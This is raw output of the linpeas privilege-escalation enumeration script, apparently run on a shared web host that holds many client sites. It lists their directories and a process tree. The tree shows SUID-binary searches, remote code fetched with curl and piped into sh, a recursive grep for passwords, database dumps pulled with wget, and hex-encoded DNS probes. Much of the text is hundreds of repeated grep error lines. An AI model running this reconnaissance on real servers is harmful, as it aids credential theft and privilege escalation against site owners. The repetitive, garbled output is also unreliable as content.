/home2/webapps1/pressneo.neowep.com /home2/webapps1/public_ftp /home2/webapps1/public_html /home2/webapps1/qrattendance.neowep.com /home2/webapps1/quarantine_clamavconnector /home2/webapps1/queen.neowep.com /home2/webapps1/quotncode.com /home2/webapps1/radhaacol-edu.org /home2/webapps1/raise.neowep.com /home2/webapps1/ram.neowep.com /home2/webapps1/repair.neowep.in /home2/webapps1/res.neowep.in /home2/webapps1/resnan.neowep.in /home2/webapps1/resort.ishaneowep.com /home2/webapps1/resorts.neowep.com /home2/webapps1/resr.neowep.in /home2/webapps1/restaurant.ishaneowep.com /home2/webapps1/restaurant.webappsdigital.com /home2/webapps1/rjpinfotek.webappsdigital.com /home2/webapps1/rlhospital.neowep.in /home2/webapps1/rnr.neowep.com /home2/webapps1/rose.webappsdigital.com /home2/webapps1/royalwatches.co.in /home2/webapps1/rpn.neowep.com /home2/webapps1/rpnp.neowep.com /home2/webapps1/rpr.neowep.in /home2/webapps1/rrspromoters.com /home2/webapps1/rtf.neowep.com /home2/webapps1/s-entrepreneurship.org /home2/webapps1/sag.neowep.com /home2/webapps1/sai.neowep.in /home2/webapps1/saiagency.neowep.in /home2/webapps1/sakthi.webappsdigital.com /home2/webapps1/salon.webappsdigital.com /home2/webapps1/salonbook.webappsdigital.com /home2/webapps1/sam.neowep.com /home2/webapps1/samonewaytaxi.com /home2/webapps1/sankarponnarschool.com /home2/webapps1/sanyoconstruction.com /home2/webapps1/sas.neowep.com /home2/webapps1/sassi.neowep.com /home2/webapps1/sathayam.neowep.in /home2/webapps1/sathiyam.neowep.in /home2/webapps1/sbzacademy.com /home2/webapps1/school.greenparksmartschool.org /home2/webapps1/schooldemo.neowep.com /home2/webapps1/schoolerp /home2/webapps1/se.ishaneowep.com /home2/webapps1/senthil.neowep.com /home2/webapps1/service.neowep.in /home2/webapps1/services.ishaneowep.com /home2/webapps1/services.neowep.in /home2/webapps1/sgacbseschool.com /home2/webapps1/sgacbseschool.ishaneowep.com /home2/webapps1/shainfotech.ishaneowep.com /home2/webapps1/sharan.neowep.com /home2/webapps1/shop.equipzindia.com /home2/webapps1/signalloans.webappsdigital.com /home2/webapps1/signalmob.neowep.com /home2/webapps1/signalrental /home2/webapps1/signalrental.webappsdigital.com /home2/webapps1/sivamens.neowep.com /home2/webapps1/skallshop.com /home2/webapps1/skynet.neowep.in /home2/webapps1/slc.webappsdigital.com /home2/webapps1/smee.neowep.com /home2/webapps1/smm.webappsdigital.com /home2/webapps1/smobile.neowep.com /home2/webapps1/sms.neowep.in /home2/webapps1/sms1.neowep.com /home2/webapps1/snapminds.webappsdigital.com /home2/webapps1/socialpost.webappsdigital.com /home2/webapps1/softaculous_backups /home2/webapps1/soniesfamilysalon.com /home2/webapps1/sparrow.ishaneowep.com /home2/webapps1/spartans.ishaneowep.com /home2/webapps1/spartansaccounts.ishaneowep.com /home2/webapps1/spsveg.neowep.in /home2/webapps1/srfoodspalacode.in /home2/webapps1/sriamman.neowep.com /home2/webapps1/sribalaji.webappsdigital.com /home2/webapps1/sribharathiagency.ishaneowep.com /home2/webapps1/srignanambigaavidyalaya.com /home2/webapps1/srigroups.ishaneowep.com /home2/webapps1/srikrishnaenterprise /home2/webapps1/srimahasakthipeedam.com /home2/webapps1/sripanjavarnesuvararhttb.com /home2/webapps1/sripos.neowep.com /home2/webapps1/sriramakrishnapyramidtemple.in /home2/webapps1/sriramsilks.co.in /home2/webapps1/srm.neowep.in /home2/webapps1/srplywood.neowep.com /home2/webapps1/srripaspocon.org /home2/webapps1/srtexports.in /home2/webapps1/ssbng.webappsdigital.com /home2/webapps1/sscurtains.ishaneowep.com /home2/webapps1/ssdonkeysmilk /home2/webapps1/ssdsatdharmapuri.com /home2/webapps1/ssjcb.neowep.in /home2/webapps1/ssk.neowep.in /home2/webapps1/ssl /home2/webapps1/sst.neowep.in /home2/webapps1/statusflags.in /home2/webapps1/stmt.ishaneowep.com /home2/webapps1/stmt.neowep.com /home2/webapps1/sugam.neowep.com /home2/webapps1/sugam.neowep.in /home2/webapps1/surfnxt /home2/webapps1/sv.neowep.com /home2/webapps1/svet.neowep.in /home2/webapps1/svt.neowep.com /home2/webapps1/swaproducts.com /home2/webapps1/swathi.neowep.in /home2/webapps1/tamilagro.neowep.in /home2/webapps1/tamilan.neowep.in /home2/webapps1/tamilan.noeowep.in /home2/webapps1/tamilpos.ishaneowep.com /home2/webapps1/task.neowep.in /home2/webapps1/taxi /home2/webapps1/taxi.ishaneowep.com /home2/webapps1/tds.neowep.com /home2/webapps1/tea.neowep.com /home2/webapps1/techwindtechnologies.com /home2/webapps1/templete.zendodigitalcorp.com /home2/webapps1/testplusone.webappsdigital.com /home2/webapps1/text.neowep.in /home2/webapps1/text1.neowep.com /home2/webapps1/thagadurmart.com /home2/webapps1/thennarkadu.com /home2/webapps1/thenpannaivirunthu.com /home2/webapps1/thenu.neowep.com /home2/webapps1/theunicokodai.com /home2/webapps1/tm.neowep.com /home2/webapps1/tmp /home2/webapps1/traderszone.in /home2/webapps1/trafficdatacounts.com /home2/webapps1/trans.neowep.in /home2/webapps1/transforma.webappsdigital.com /home2/webapps1/travel.neowep.in /home2/webapps1/trdfin.webappsdigital.com /home2/webapps1/trdfintestebb.webappsdigital.com /home2/webapps1/trdtravels.webappsdigital.com /home2/webapps1/trial.ishaneowep.com /home2/webapps1/truck.webappsdigital.com /home2/webapps1/truelife.neowep.com /home2/webapps1/ttdmok.com /home2/webapps1/tvksv.in /home2/webapps1/ultimatepos /home2/webapps1/urbanclap.neowep.in /home2/webapps1/uvproduction.in /home2/webapps1/uvproductions.webappsdigital.com /home2/webapps1/vaagaienterprises.ishaneowep.com /home2/webapps1/vanniyarchozharmanamaalai.com /home2/webapps1/vanniyarmarriage.in /home2/webapps1/vanniyars.com /home2/webapps1/var /home2/webapps1/varmaschai.com /home2/webapps1/varmavanigarsabai.in /home2/webapps1/vcard.neowep.in /home2/webapps1/vedanthsaionline.webappsdigital.com /home2/webapps1/veerabadrare.com /home2/webapps1/velappar.com /home2/webapps1/velcarcarekpm.com /home2/webapps1/vennila.neowep.com /home2/webapps1/vgroup.org.in /home2/webapps1/vgv.ishaneowep.com /home2/webapps1/vijay-paramedical.in /home2/webapps1/vijayaelc.neowep.in /home2/webapps1/vikash.neowep.in /home2/webapps1/vino.neowep.com /home2/webapps1/vishwa.ishaneowep.com /home2/webapps1/vishwamatha.com /home2/webapps1/visit.neowep.in /home2/webapps1/visitorpass.webappsdigital.com /home2/webapps1/vvscomp.neowep.in /home2/webapps1/vwg.neowep.com /home2/webapps1/watercan.ishaneowep.com /home2/webapps1/way2smartservice.com /home2/webapps1/webapps.neowep.com /home2/webapps1/whatsapp /home2/webapps1/wordpress-backups /home2/webapps1/workout.ishaneowep.com /home2/webapps1/www /home2/webapps1/www.oneupknits.com /home2/webapps1/yalsri.neowep.in /home2/webapps1/yosihr.webappsdigital.com /home2/webapps1/zendo.neowep.com /home2/webapps1/zendo1.neowep.com /home2/webapps1/zendodigitalcorp.com webapps1 3988181 0.0 0.0 32496 1768 pts/0 T Dec22 0:00 _ sort -rh webapps1 3992427 0.0 0.0 9896 6828 pts/0 T Dec22 0:07 _ du -h --max-depth=1 /home2/webapps1 webapps1 3992428 0.0 0.0 32496 1764 pts/0 T Dec22 0:00 _ sort -rh webapps1 4008700 0.0 0.0 95216 10504 pts/0 T Dec22 0:00 _ wget -qO- https://webappsdigital.com/webapps1_muralipickle.sql.gz webapps1 4008701 0.0 0.0 5348 1444 pts/0 T Dec22 0:00 _ gzip -d webapps1 4009444 0.0 0.0 95224 10644 pts/0 T Dec22 0:00 _ wget -qO- https://webappsdigital.com/webapps1_muralipickle.sql.gz webapps1 4009445 0.0 0.0 5348 1508 pts/0 T Dec22 0:00 _ gzip -d webapps1 4141273 0.0 0.0 230772 93428 pts/0 Tl 00:10 0:11 _ python3 main.py webapps1 966308 0.0 0.0 17456 2740 pts/0 T 09:23 0:00 _ find / -perm -u=s -type f webapps1 979415 0.0 0.0 19916 5232 pts/0 T 09:32 0:05 _ find / -perm -u=s -type f webapps1 1844079 0.2 0.0 22988 8140 pts/0 T 17:32 0:06 _ find / -perm -4000 webapps1 1850679 0.0 0.0 44532 36780 pts/0 T 17:36 0:01 _ sh webapps1 1977834 11.3 0.0 21556 6768 pts/0 T 18:06 0:14 | _ find / -type f -iname .* ! -path /sys/* ! -path /System/* ! -path /private/var/* -exec ls -l {} ; webapps1 2029429 0.0 0.0 15712 1240 pts/0 T 18:07 0:00 | _ ls -l /home2/webapps1/mg.neowep.in/vendor/mpociot/reflection-docblock/.travis.yml webapps1 2031101 0.0 0.0 181308 11056 pts/0 S+ 18:08 0:00 _ curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh webapps1 2031102 3.8 0.0 44532 36808 pts/0 S+ 18:08 0:00 _ sh webapps1 2034317 0.0 0.0 44532 35560 pts/0 S+ 18:08 0:00 | _ sh webapps1 2034319 0.0 0.0 43648 2156 pts/0 R+ 18:08 0:00 | | _ ps fauxwww webapps1 2034321 0.0 0.0 44532 34024 pts/0 S+ 18:08 0:00 | _ sh webapps1 2031103 0.0 0.0 4480 852 pts/0 S+ 18:08 0:00 _ tee all.txt webapps1 3730677 0.0 0.0 10860 1252 ? S Dec22 0:00 sh -c python3 main.py 2>&1 webapps1 3730678 0.0 0.0 677620 38612 ? Sl Dec22 0:29 _ python3 main.py webapps1 3733756 0.0 0.0 62772 2428 ? S Dec22 0:00 _ ping google.com webapps1 3754123 0.0 0.0 10060 2844 ? S Dec22 0:00 _ grep -ri password . ╔══════════╣ Processes with unusual configurations grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Unmatched ) or \) grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Invalid content of \{\} grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ grep: Unmatched \{ Process 4141273 (webapps1) - python3 main.py Unusual number of FDs: 107 ╔══════════╣ Processes with credentials in memory (root req) ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#credentials-from-process-memory gdm-password Not Found gnome-keyring-daemon Not Found lightdm Not Found vsftpd Not Found apache2 Not Found sshd: Not Found mysql Not Found postgres Not Found redis-server Not Found mongod Not Found memcached Not Found elasticsearch Not Found jenkins Not Found tomcat Not Found nginx Not Found php-fpm Not Found supervisord Not Found vncserver Not Found xrdp Not Found teamviewer Not Found  ╔══════════╣ Opened Files by processes Process 966308 (webapps1) - find / -perm -u=s -type f └─ Has open files: └─ /dev/pts/0 └─ /home2/webapps1/amc.ishaneowep.com/admin/logo └─ /opt/cpanel/ea-php72/root/usr/share/tests/pear └─ /opt/cpanel/ea-php72/root/usr/share/tests/pear/XML_Util └─ /opt/cpanel/ea-php72/root/usr/share └─ /opt/cpanel/ea-php72/root/usr/share/tests Process 979415 (webapps1) - find / -perm -u=s -type f └─ Has open files: └─ /dev/pts/0 └─ /home2/webapps1/amc.ishaneowep.com/admin/logo └─ /home2/webapps1/himalayanschools.com/system/language/german └─ /home2/webapps1/himalayanschools.com/system/language └─ /home2/webapps1/himalayanschools.com/system Process 1844079 (webapps1) - find / -perm -4000 └─ Has open files: └─ /dev/pts/0 └─ /home2/webapps1/sriramsilks.co.in/core/storage/framework/cache/data └─ /home2/webapps1/amc.ishaneowep.com/admin/logo └─ /home2/webapps1/sriramsilks.co.in/core/storage/framework/cache/data/38/28 └─ /home2/webapps1/sriramsilks.co.in/core/storage/framework/cache/data/38 └─ /home2/webapps1/sriramsilks.co.in/core/storage/framework └─ /home2/webapps1/sriramsilks.co.in/core/storage/framework/cache Process 1850679 (webapps1) - sh └─ Has open files: └─ pipe:[4164903747] └─ /dev/pts/0 Process 1935952 (webapps1) - bash -c ((( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | x └─ Has open files: └─ /dev/pts/0 Process 1935953 (webapps1) - bash -c ((( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | x └─ Has open files: └─ pipe:[4165222462] Process 1935954 (webapps1) - grep accessible └─ Has open files: └─ pipe:[4165222462] └─ /dev/pts/0 Process 1935957 (webapps1) - bash -c ((( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | x └─ Has open files: └─ pipe:[4165222462] Process 1935961 (webapps1) - dd bs=9000 count=1 └─ Has open files: └─ pipe:[4165200564] Process 1977834 (webapps1) - find / -type f -iname .* ! -path /sys/* ! -path /System/* ! -path /private/var/* -exec ls -l {} ; └─ Has open files: └─ pipe:[4164903747] └─ pipe:[4165664669] └─ /tmp └─ 